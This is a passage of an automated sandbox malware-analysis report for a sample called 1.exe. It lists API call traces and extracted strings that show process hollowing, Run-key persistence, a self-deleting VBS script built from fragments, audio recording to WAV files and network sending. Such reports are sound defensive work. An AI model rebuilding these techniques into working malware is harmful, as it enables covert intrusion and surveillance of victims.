                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("$xdF$xpF
                                                  • API String ID: 1861856835-1567776996
                                                  • Opcode ID: 5f45ac33405eca6a6418f12c7c0070af3fac978fb24460debf3ac268156682be
                                                  • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                                  • Opcode Fuzzy Hash: 5f45ac33405eca6a6418f12c7c0070af3fac978fb24460debf3ac268156682be
                                                  • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  • Opcode ID: 6fe37197d8788220cf6427c040a72875e8f2824bd02e1a8f118f24072f5bfafb
                                                  • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                                  • Opcode Fuzzy Hash: 6fe37197d8788220cf6427c040a72875e8f2824bd02e1a8f118f24072f5bfafb
                                                  • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$HSG$HVP$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xdF$xpF
                                                  • API String ID: 3797177996-22743124
                                                  • Opcode ID: 4bc1e5abadf7e28e8e315d5c81c4c4b870a7fe3f4213872e4c7b026e24655e3a
                                                  • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                                  • Opcode Fuzzy Hash: 4bc1e5abadf7e28e8e315d5c81c4c4b870a7fe3f4213872e4c7b026e24655e3a
                                                  • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,0Q,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: (TG$.exe$0Q$HSG$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-2595611457
                                                  • Opcode ID: cf71c8582fcbc529644aa9cf4184cee0d69caa517f204d0028ad195fc44aa791
                                                  • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                  • Opcode Fuzzy Hash: cf71c8582fcbc529644aa9cf4184cee0d69caa517f204d0028ad195fc44aa791
                                                  • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                  • API String ID: 738084811-1354618412
                                                  • Opcode ID: 7723ecefd4c74f0a061d8a4132d66bee01c94676268c8750fb7b466ccf26ac0c
                                                  • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                                  • Opcode Fuzzy Hash: 7723ecefd4c74f0a061d8a4132d66bee01c94676268c8750fb7b466ccf26ac0c
                                                  • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                                  • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                                  • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                                  • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                  • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                                  • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                  • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1.exe,00000001,00407688,C:\Users\user\Desktop\1.exe,00000003,004076B0,HVP,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Users\user\Desktop\1.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-1000048718
                                                  • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                  • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                                  • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                  • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID: H%P
                                                  • API String ID: 3899193279-38831225
                                                  • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                  • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                  • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$,aF$@TG$@TG
                                                  • API String ID: 1223786279-971885606
                                                  • Opcode ID: 13a8764fa1243628ef4a410295faa1a4c416e36506aa561c708d14dcdde7889a
                                                  • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                                  • Opcode Fuzzy Hash: 13a8764fa1243628ef4a410295faa1a4c416e36506aa561c708d14dcdde7889a
                                                  • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: EIA$\ws2_32$\wship6$getaddrinfo
                                                  • API String ID: 2490988753-3348721785
                                                  • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                  • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                                  • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                  • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
